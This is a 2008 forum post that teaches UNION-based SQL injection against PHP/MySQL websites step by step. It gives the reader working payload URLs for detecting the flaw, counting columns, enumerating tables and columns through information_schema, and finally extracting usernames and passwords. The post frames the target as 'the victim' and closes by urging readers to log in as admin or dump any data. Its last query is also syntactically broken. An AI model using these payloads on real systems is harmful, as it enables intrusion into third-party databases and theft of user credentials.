paxnWo Posted November 20, 2008 Report Posted November 20, 2008 I will try to present the method I'm using when doing SQL Injections.This tutorial/guide will be wrapped around PHP + MySQL (MyISAM, Default engine as of MySQL 3.23).I assume you have PHP and MySQL basic knowlegde.How can i find out if a site is vulnerable to SQL injection ?Let's suppose that you are surfing a site and you notice that the link looks like this:http://site.com/view.php?id=1234You try to see if it vulnerable by adding a character such as ' or " and the URL will look similar to:http://site.com/view.php?id=1234' orhttp://site.com/view.php?id=1234"If it gives an error such as:1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1234''' at line 1 Very nice. We have some vulnerable code to play with.Let's try to visualize how the programmer wrote the vulnerable PHP code.$query = "SELECT * FROM products WHERE id='". $_GET['id'] ."'";mysql_query($query);echo mysql_error(); We can clearly see that he did not try to sanitize any of the variables.To further test if you can create a valid MySQL query you could try to insert ' or 1='1, thus creating the link:http://site.com/view.php?id=' or 1='1If it will not give you an error it means that you can probably can insert whatever your heart desires.Let's make a small analysis of the SQL queries just created.If you insert 1234' the query looks like this:SELECT * FROM products WHERE id='1234'' - it is obviously wrongIf you insert ' or 1='1 you get:SELECT * FROM products WHERE id='' or 1='1' - this is a valid SQL statement that will retrieve the first item in the tableOk, at this point we know we can SQL Inject the victim.What's next ?Preparing for the attackWe need to find how many columns the table products hasThis is pretty easy. I strongly recommend using HackBar at least from now on.This is done with adding ' ORDER BY [number].You start from 1 and end when you get a MySQL error. Then you will know that the previous number was the limit of the columns that are retrieved in the query.It goes like this:http://site.com/view.php?id=1234' ORDER BY 1 /*http://site.com/view.php?id=1234' ORDER BY 2 /*...http://site.com/view.php?id=1234' ORDER BY 7 /*http://site.com/view.php?id=1234' ORDER BY 8 /* <- here we get the MySQL error we were searching for.This means that the select retrieves 7 columns.What next?Doing a basic attackFirst we need to create the basic string that will help us getting the information we want from the database.http://site.com/view.php?id=12349999' UNION ALL SELECT 1,2,3,4,5,6,7 FROM [tablename] /*This is it.Why did i insert 12349999 ?Because we don't want anything else to be selected from the table, we only want the information that helps us.So i inserted an id that i am sure it does not exist.And we start searching for table names until we don't get a MySQL error.You could try table names like: user, users, members, admin, member, ...But what can i do if i cannot guess a valid table name ?This brings us to the next step.When you execute this query you need to find in the page some of the numbersFor example if you see the numbers 2 and 4 in the page you know that the second and the fourth columns are echoed.We will use these columns to retrieve the data we want in the next steps.Extracting the database structure through SQL InjectionMySQL has a database named: information_schemaThis database has all the information we want.For example it has a table named: TABLESIf you install MySQL engine and you look at this table you can clearly see what it has stored. You can fetch the table names from there.Let's see how such query looks likehttp://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables/*The problem here is that we do not retrieve exactly the data we want. We need to change some things.We need the database name that we want to attack. This can be retrieved with:http://site.com/view.php?id=12349999' union all select 1,2,3,4,5,6,7 from TableThatDoesNotExist/*It will output an error that discloses the database name:1146: Table 'DataBaseName.TableThatDoesNotExist' doesn't existUsing this information we can create this query:http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' /*Here we have another problem, we can see only 1 tablename and it's assigned number of rows inserted.We need to surf through all the tables of this database.http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' LIMIT 1,1/*this gives us the first tablenamehttp://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' LIMIT 2,1/*the second tablenamehttp://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' LIMIT 3,1/*the third, and so on, until we get all the table names.I suggest you note the information retrieved because you will need this for further digging.Ok, so we have all the table names now.What do we need to do next ?The column names.This is very similar, because this information is also stored in information_schema database.http://site.com/view.php?id=12349999' union all select 1,COLUMN_NAME,3,PRIVILEGES,5,6,7 from information_schema.columns where TABLE_SCHEMA='DataBaseName' and TABLE_NAME='members' limit 1,1/*the first column name of table membershttp://site.com/view.php?id=12349999' union all select 1,COLUMN_NAME,3,PRIVILEGES,5,6,7 from information_schema.columns where TABLE_SCHEMA='DataBaseName' and TABLE_NAME='members' limit 2,1/*the second one, and so on...At this point we have the table names with their column names also.I think we have all we need now.Chanting the magic wordsAs i said we have the table names and the column names.Let's create the query that will read a username and password from table membershttp://site.com/view.php?id=12349999' union all select 1,user,3,password,5,6,7 from members where LIMIT 1,1/*That was it folks.Log in with admin password, or create a script that will extract any data you want from their database.Your choice.by zbeng Quote
